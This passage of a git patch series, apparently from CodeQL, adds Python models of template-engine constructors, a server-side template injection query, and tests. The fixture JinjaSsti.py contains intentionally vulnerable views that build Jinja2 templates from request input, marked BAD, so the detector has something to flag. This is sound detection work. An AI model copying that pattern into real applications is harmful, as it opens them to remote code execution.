MakoTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + MakoTemplateConstruction() { + this = API::moduleImport("mako").getMember("template").getMember("Template").getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } +} diff --git a/python/ql/lib/semmle/python/frameworks/TRender.qll b/python/ql/lib/semmle/python/frameworks/TRender.qll new file mode 100644 index 00000000000..08749676a06 --- /dev/null +++ b/python/ql/lib/semmle/python/frameworks/TRender.qll @@ -0,0 +1,26 @@ +/** + * Provides classes modeling security-relevant aspects of the `trender` PyPI package. + * See https://github.com/cesbit/trender. + */ + +private import python +private import semmle.python.dataflow.new.DataFlow +private import semmle.python.ApiGraphs +private import semmle.python.Concepts + +/** + * INTERNAL: Do not use. + * + * Provides classes modeling security-relevant aspects of the `trender` PyPI package. + * See https://github.com/cesbit/trender. + */ +module TRender { + /** A call to `trender.TRender`. */ + private class TRenderTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + TRenderTemplateConstruction() { + this = API::moduleImport("trender").getMember("TRender").getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } +} From 71ab82dee06a4252c64e650c76773133cfc8d9e1 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Thu, 7 Nov 2024 14:40:51 +0000 Subject: [PATCH 0942/1267] Fix qldoc, formatting, and redundant import warnings --- python/ql/lib/semmle/python/Concepts.qll | 3 +-- python/ql/lib/semmle/python/frameworks/Airspeed.qll | 1 - python/ql/lib/semmle/python/frameworks/Chameleon.qll | 1 - python/ql/lib/semmle/python/frameworks/Chevron.qll | 1 - python/ql/lib/semmle/python/frameworks/Django.qll | 2 -- python/ql/lib/semmle/python/frameworks/Genshi.qll | 1 - python/ql/lib/semmle/python/frameworks/Jinja2.qll | 1 - python/ql/lib/semmle/python/frameworks/Mako.qll | 1 - python/ql/lib/semmle/python/frameworks/TRender.qll | 1 - .../semmle/python/security/dataflow/TemplateInjectionQuery.qll | 3 ++- 10 files changed, 3 insertions(+), 12 deletions(-) diff --git a/python/ql/lib/semmle/python/Concepts.qll b/python/ql/lib/semmle/python/Concepts.qll index cf6f0214496..94d660d7510 100644 --- a/python/ql/lib/semmle/python/Concepts.qll +++ b/python/ql/lib/semmle/python/Concepts.qll @@ -872,7 +872,7 @@ class TemplateConstruction extends DataFlow::Node instanceof TemplateConstructio DataFlow::Node getSourceArg() { result = super.getSourceArg() } } -/** Provides classes for modelling template construction APIs. */ +/** Provides classes for modeling template construction APIs. */ module TemplateConstruction { /** * A data-flow node that constructs a template in a templating engine. @@ -886,7 +886,6 @@ module TemplateConstruction { } } - /** Provides classes for modeling HTTP-related APIs. */ module Http { /** Gets an HTTP verb, in upper case */ diff --git a/python/ql/lib/semmle/python/frameworks/Airspeed.qll b/python/ql/lib/semmle/python/frameworks/Airspeed.qll index bdfc2ae357d..a08a1b4a46b 100644 --- a/python/ql/lib/semmle/python/frameworks/Airspeed.qll +++ b/python/ql/lib/semmle/python/frameworks/Airspeed.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/frameworks/Chameleon.qll b/python/ql/lib/semmle/python/frameworks/Chameleon.qll index 2f86d784b96..cf5444c40ce 100644 --- a/python/ql/lib/semmle/python/frameworks/Chameleon.qll +++ b/python/ql/lib/semmle/python/frameworks/Chameleon.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/frameworks/Chevron.qll b/python/ql/lib/semmle/python/frameworks/Chevron.qll index 5d938fef208..ec5676a2f04 100644 --- a/python/ql/lib/semmle/python/frameworks/Chevron.qll +++ b/python/ql/lib/semmle/python/frameworks/Chevron.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/frameworks/Django.qll b/python/ql/lib/semmle/python/frameworks/Django.qll index 80ef4aef435..4aa5776ad54 100644 --- a/python/ql/lib/semmle/python/frameworks/Django.qll +++ b/python/ql/lib/semmle/python/frameworks/Django.qll @@ -3000,7 +3000,6 @@ module PrivateDjango { // --------------------------------------------------------------------------- // Templates // --------------------------------------------------------------------------- - /** A call to `django.template.Template` */ private class DjangoTemplateConstruction extends TemplateConstruction::Range, API::CallNode { DjangoTemplateConstruction() { @@ -3009,6 +3008,5 @@ module PrivateDjango { override DataFlow::Node getSourceArg() { result = this.getArg(0) } } - // TODO: Support `from_string` on instances of `django.template.Engine`. } diff --git a/python/ql/lib/semmle/python/frameworks/Genshi.qll b/python/ql/lib/semmle/python/frameworks/Genshi.qll index f01b5137aac..1e29295b428 100644 --- a/python/ql/lib/semmle/python/frameworks/Genshi.qll +++ b/python/ql/lib/semmle/python/frameworks/Genshi.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index c89ffbe3cc9..9f267915e5c 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts private import semmle.python.frameworks.data.ModelsAsData diff --git a/python/ql/lib/semmle/python/frameworks/Mako.qll b/python/ql/lib/semmle/python/frameworks/Mako.qll index 5dd518a8afe..2209c0f89d2 100644 --- a/python/ql/lib/semmle/python/frameworks/Mako.qll +++ b/python/ql/lib/semmle/python/frameworks/Mako.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/frameworks/TRender.qll b/python/ql/lib/semmle/python/frameworks/TRender.qll index 08749676a06..fae27f418c3 100644 --- a/python/ql/lib/semmle/python/frameworks/TRender.qll +++ b/python/ql/lib/semmle/python/frameworks/TRender.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll index e5ad529fb37..22c228f48d5 100644 --- a/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll +++ b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll @@ -11,7 +11,7 @@ import semmle.python.dataflow.new.DataFlow import semmle.python.dataflow.new.TaintTracking import TemplateInjectionCustomizations::TemplateInjection -module TemplateInjectionConfig implements DataFlow::ConfigSig { +private module TemplateInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node node) { node instanceof Source } predicate isSink(DataFlow::Node node) { node instanceof Sink } @@ -19,4 +19,5 @@ module TemplateInjectionConfig implements DataFlow::ConfigSig { predicate isBarrierIn(DataFlow::Node node) { node instanceof Sanitizer } } +/** Global taint-tracking for detecting "template injection" vulnerabilities. */ module TemplateInjectionFlow = TaintTracking::Global; From 1cb01a286d622d30a95077567fa42f02cd125669 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Wed, 20 Nov 2024 14:50:35 +0000 Subject: [PATCH 0943/1267] Add tests for jinja --- .../src/Security/CWE-074/TemplateInjection.ql | 19 ++++++++++++ .../CWE-074-TemplateInjection/JinjaSsti.py | 31 +++++++++++++++++++ .../TemplateInjection.expected | 16 ++++++++++ .../TemplateInjection.qlref | 1 + 4 files changed, 67 insertions(+) create mode 100644 python/ql/src/Security/CWE-074/TemplateInjection.ql create mode 100644 python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py create mode 100644 python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected create mode 100644 python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.ql b/python/ql/src/Security/CWE-074/TemplateInjection.ql new file mode 100644 index 00000000000..125478c801c --- /dev/null +++ b/python/ql/src/Security/CWE-074/TemplateInjection.ql @@ -0,0 +1,19 @@ +/** + * @name Server Side Template Injection + * @description Using user-controlled data to create a template can lead to remote code execution or cross site scripting. + * @kind path-problem + * @problem.severity error + * @precision high + * @id py/template-injection + * @tags security + * external/cwe/cwe-074 + */ + +import python +import semmle.python.security.dataflow.TemplateInjectionQuery +import TemplateInjectionFlow::PathGraph + +from TemplateInjectionFlow::PathNode source, TemplateInjectionFlow::PathNode sink +where TemplateInjectionFlow::flowPath(source, sink) +select sink.getNode(), source, sink, "This Template construction depends on $@.", source.getNode(), + "user-provided value" diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py new file mode 100644 index 00000000000..f1fe834e493 --- /dev/null +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py @@ -0,0 +1,31 @@ +from django.urls import path +from django.http import HttpResponse +from jinja2 import Template +from jinja2 import Environment, DictLoader, escape + + +def a(request): + # Load the template + template = request.GET['template'] + t = Template(template) # BAD: Template constructed from user input + name = request.GET['name'] + # Render the template with the context data + html = t.render(name=escape(name)) + return HttpResponse(html) + +def b(request): + import jinja2 + # Load the template + template = request.GET['template'] + env = Environment() + t = env.from_string(template) # BAD: Template constructed from user input + name = request.GET['name'] + # Render the template with the context data + html = t.render(name=escape(name)) + return HttpResponse(html) + + +urlpatterns = [ + path('a', a), + path('b', b) +] diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected new file mode 100644 index 00000000000..3a833787a98 --- /dev/null +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected @@ -0,0 +1,16 @@ +edges +| JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | +| JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | provenance | | +| JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | +| JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | provenance | | +nodes +| JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | +| JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | +| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | +| JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | +| JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | +| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | +subpaths +#select +| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This Template construction depends on $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | +| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This Template construction depends on $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref new file mode 100644 index 00000000000..ead6bb469c6 --- /dev/null +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref @@ -0,0 +1 @@ +Security/CWE-074/TemplateInjection.ql \ No newline at end of file From cea196ec61cec37fc47f526a88b4775a5a629d65 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Thu, 21 Nov 2024 14:56:44 +0000 Subject: [PATCH 0944/1267] Add concepts tests + some fixes --- .../ql/lib/semmle/python/frameworks/Flask.qll | 7 +++++-- .../ql/lib/semmle/python/frameworks/Genshi.qll | 2 +- .../ql/lib/semmle/python/frameworks/Jinja2.qll | 1 + .../ql/test/experimental/meta/ConceptsTest.qll | 17 ++++++++++++++++- .../frameworks/Genshi/ConceptsTest.expected | 2 ++ .../frameworks/Genshi/ConceptsTest.ql | 2 ++ .../frameworks/Genshi/template_test.py | 9 +++++++++ .../frameworks/Mako/ConceptsTest.expected | 2 ++ .../frameworks/Mako/ConceptsTest.ql | 2 ++ .../frameworks/Mako/template_test.py | 4 ++++ .../frameworks/TRender/ConceptsTest.expected | 2 ++ .../frameworks/TRender/ConceptsTest.ql | 2 ++ .../frameworks/TRender/template_test.py | 4 ++++ .../frameworks/airspeed/ConceptsTest.expected | 2 ++ .../frameworks/airspeed/ConceptsTest.ql | 2 ++ .../frameworks/airspeed/template_test.py | 4 ++++ .../frameworks/bottle/template_test.py | 9 +++++++++ .../frameworks/chameleon/ConceptsTest.expected | 2 ++ .../frameworks/chameleon/ConceptsTest.ql | 2 ++ .../frameworks/chameleon/template_test.py | 4 ++++ .../frameworks/chevron/ConceptsTest.expected | 2 ++ .../frameworks/chevron/ConceptsTest.ql | 2 ++ .../frameworks/chevron/template_test.py | 4 ++++ .../frameworks/django-v2-v3/template_test.py | 17 +++++++++++++++++ .../frameworks/flask/taint_test.py | 8 ++++---- .../frameworks/flask/template_test.py | 16 ++++++++++++++++ .../frameworks/jinja2/ConceptsTest.expected | 2 ++ .../frameworks/jinja2/ConceptsTest.ql | 2 ++ .../frameworks/jinja2/template_test.py | 7 +++++++ 29 files changed, 133 insertions(+), 8 deletions(-) create mode 100644 python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/Genshi/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/Mako/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/Mako/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/TRender/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/TRender/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/airspeed/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/bottle/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/chameleon/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/chevron/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/chevron/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/flask/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/jinja2/template_test.py diff --git a/python/ql/lib/semmle/python/frameworks/Flask.qll b/python/ql/lib/semmle/python/frameworks/Flask.qll index cfb8048c6a1..0e5d6065c47 100644 --- a/python/ql/lib/semmle/python/frameworks/Flask.qll +++ b/python/ql/lib/semmle/python/frameworks/Flask.qll @@ -722,10 +722,13 @@ module Flask { } } - /** A call to `flask.render_template_string` as a template construction sink. */ + /** A call to `flask.render_template_string` or `flask.stream_template_string` as a template construction sink. */ private class FlaskTemplateConstruction extends TemplateConstruction::Range, API::CallNode { FlaskTemplateConstruction() { - this = API::moduleImport("flask").getMember("render_template_string").getACall() + this = + API::moduleImport("flask") + .getMember(["render_template_string", "stream_template_string"]) + .getACall() } override DataFlow::Node getSourceArg() { result = this.getArg(0) } diff --git a/python/ql/lib/semmle/python/frameworks/Genshi.qll b/python/ql/lib/semmle/python/frameworks/Genshi.qll index 1e29295b428..8e368391cf7 100644 --- a/python/ql/lib/semmle/python/frameworks/Genshi.qll +++ b/python/ql/lib/semmle/python/frameworks/Genshi.qll @@ -21,7 +21,7 @@ module Genshi { API::moduleImport("genshi") .getMember("template") .getMember("text") - .getMember(["NewTextTemplate", "OldTextTemplate"]) + .getMember(["NewTextTemplate", "OldTextTemplate", "TextTemplate"]) .getACall() } diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index 9f267915e5c..0d0a8d98921 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll @@ -24,6 +24,7 @@ module Jinja2 { override DataFlow::Node getSourceArg() { result = this.getArg(0) } } + /** Definitions for modeling jinja `Environment`s. */ module EnvironmentClass { /** Gets a reference to the `jinja2.Environment` class. */ API::Node classRef() { diff --git a/python/ql/test/experimental/meta/ConceptsTest.qll b/python/ql/test/experimental/meta/ConceptsTest.qll index 8ab87e56d1c..40aa9c951b0 100644 --- a/python/ql/test/experimental/meta/ConceptsTest.qll +++ b/python/ql/test/experimental/meta/ConceptsTest.qll @@ -663,6 +663,20 @@ module CorsMiddlewareTest implements TestSig { } } +module TemplateConstructionTest implements TestSig { + string getARelevantTag() { result = "templateConstruction" } + + predicate hasActualResult(Location location, string element, string tag, string value) { + exists(location.getFile().getRelativePath()) and + exists(TemplateConstruction tc | + location = tc.getLocation() and + element = tc.toString() and + value = prettyNodeForInlineTest(tc.getSourceArg()) and + tag = "templateConstruction" + ) + } +} + import MakeTest, MergeTests5, MergeTests5>>> + CsrfLocalProtectionSettingTest, + MergeTests3>>> diff --git a/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/Genshi/template_test.py b/python/ql/test/library-tests/frameworks/Genshi/template_test.py new file mode 100644 index 00000000000..d585ee1a81e --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Genshi/template_test.py @@ -0,0 +1,9 @@ +from genshi.template.text import TextTemplate, NewTextTemplate, OldTextTemplate +from genshi.template.markup import MarkupTemplate + +def test(): + a = TextTemplate("abc") # $ templateConstruction="abc" + a = OldTextTemplate("abc") # $ templateConstruction="abc" + a = NewTextTemplate("abc") # $ templateConstruction="abc" + a = MarkupTemplate("abc") # $ templateConstruction="abc" + return a \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/Mako/template_test.py b/python/ql/test/library-tests/frameworks/Mako/template_test.py new file mode 100644 index 00000000000..224954cf263 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Mako/template_test.py @@ -0,0 +1,4 @@ +from mako.template import Template + +def test(): + return Template("abc") # $ templateConstruction="abc" \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/TRender/template_test.py b/python/ql/test/library-tests/frameworks/TRender/template_test.py new file mode 100644 index 00000000000..f62d33c26d5 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/TRender/template_test.py @@ -0,0 +1,4 @@ +from trender import TRender + +def test(): + return TRender("abc") # $ templateConstruction="abc" \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/airspeed/template_test.py b/python/ql/test/library-tests/frameworks/airspeed/template_test.py new file mode 100644 index 00000000000..34d4c29fff6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/airspeed/template_test.py @@ -0,0 +1,4 @@ +from airspeed import Template + +def test(): + return Template("abc") # $ templateConstruction="abc" diff --git a/python/ql/test/library-tests/frameworks/bottle/template_test.py b/python/ql/test/library-tests/frameworks/bottle/template_test.py new file mode 100644 index 00000000000..db48cfc4fc9 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/bottle/template_test.py @@ -0,0 +1,9 @@ +import bottle +from bottle import response, request, template, SimpleTemplate + +app = bottle.app() +@app.route('/test', method=['OPTIONS', 'GET']) # $ routeSetup="/test" +def test1(): # $ requestHandler + template("abc") # $ templateConstruction="abc" + SimpleTemplate("abc") # $ templateConstruction="abc" + return '[1]' # $ HttpResponse mimetype=text/html responseBody='[1]' \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/chameleon/template_test.py b/python/ql/test/library-tests/frameworks/chameleon/template_test.py new file mode 100644 index 00000000000..ad6d85036ea --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chameleon/template_test.py @@ -0,0 +1,4 @@ +from chameleon import PageTemplate + +def test(): + return PageTemplate("abc") # $ templateConstruction="abc" \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/chevron/template_test.py b/python/ql/test/library-tests/frameworks/chevron/template_test.py new file mode 100644 index 00000000000..7aff524166d --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chevron/template_test.py @@ -0,0 +1,4 @@ +from chevron import render + +def test(): + return render("abc") # $ templateConstruction="abc" \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py new file mode 100644 index 00000000000..2d25848fde6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py @@ -0,0 +1,17 @@ +from django.template import Template, engines +from django.urls import path +from django.http.response import HttpResponse, + +def a(request): # $requestHandler + t = Template("abc").render() # $templateConstruction="abc" + return HttpResponse(t) # $HttpResponse + +def b(request): # $requestHandler + # This case is not yet supported + t = django.template.engines["django"].from_string("abc") # $MISSING:templateConstruction="abc" + return HttpResponse(t) # $HttpResponse + +urlpatterns = [ + path("a", a), # $ routeSetup="a" + path("b", b), # $ routeSetup="b" +] \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/flask/taint_test.py b/python/ql/test/library-tests/frameworks/flask/taint_test.py index 227aecbf745..ac8a5a82dc2 100644 --- a/python/ql/test/library-tests/frameworks/flask/taint_test.py +++ b/python/ql/test/library-tests/frameworks/flask/taint_test.py @@ -222,25 +222,25 @@ def test_taint(name = "World!", number="0", foo="foo"): # $requestHandler route # render_template_string source = TAINTED_STRING ensure_tainted(source) # $ tainted - res = render_template_string(source) + res = render_template_string(source) # $ templateConstruction=source ensure_tainted(res) # $ tainted # since template variables are auto-escaped, we don't treat result as tainted # see https://flask.palletsprojects.com/en/2.3.x/api/#flask.render_template_string - res = render_template_string("Hello {{ foo }}", foo=TAINTED_STRING) + res = render_template_string("Hello {{ foo }}", foo=TAINTED_STRING) # $ templateConstruction="Hello {{ foo }}" ensure_not_tainted(res) # stream_template_string source = TAINTED_STRING ensure_tainted(source) # $ tainted - res = stream_template_string(source) + res = stream_template_string(source) # $ templateConstruction=source for x in res: ensure_tainted(x) # $ tainted # since template variables are auto-escaped, we don't treat result as tainted # see https://flask.palletsprojects.com/en/2.3.x/api/#flask.stream_template_string - res = stream_template_string("Hello {{ foo }}", foo=TAINTED_STRING) + res = stream_template_string("Hello {{ foo }}", foo=TAINTED_STRING) # $ templateConstruction="Hello {{ foo }}" for x in res: ensure_not_tainted(x) diff --git a/python/ql/test/library-tests/frameworks/flask/template_test.py b/python/ql/test/library-tests/frameworks/flask/template_test.py new file mode 100644 index 00000000000..8d867e14829 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/flask/template_test.py @@ -0,0 +1,16 @@ +from flask import Flask, Response, stream_with_context, render_template_string, stream_template_string +app = Flask(__name__) + +@app.route("/a") # $routeSetup="/a" +def a(): # $requestHandler + r = render_template_string("abc") # $ templateConstruction="abc" + return r # $ HttpResponse + +@app.route("/b") # $routeSetup="/b" +def b(): # $requestHandler + s = stream_template_string("abc") # $ templateConstruction="abc" + r = Response(stream_with_context(s)) # $ HttpResponse + return r # $ HttpResponse + +if __name__ == "__main__": + app.run(debug=True) \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/jinja2/template_test.py b/python/ql/test/library-tests/frameworks/jinja2/template_test.py new file mode 100644 index 00000000000..587de84f621 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/jinja2/template_test.py @@ -0,0 +1,7 @@ +from jinja2 import Environment, Template + +def test(): + env = Environment() + t = env.from_string("abc") # $ templateConstruction="abc" + t = Template("abc") # $ templateConstruction="abc" + return t \ No newline at end of file From 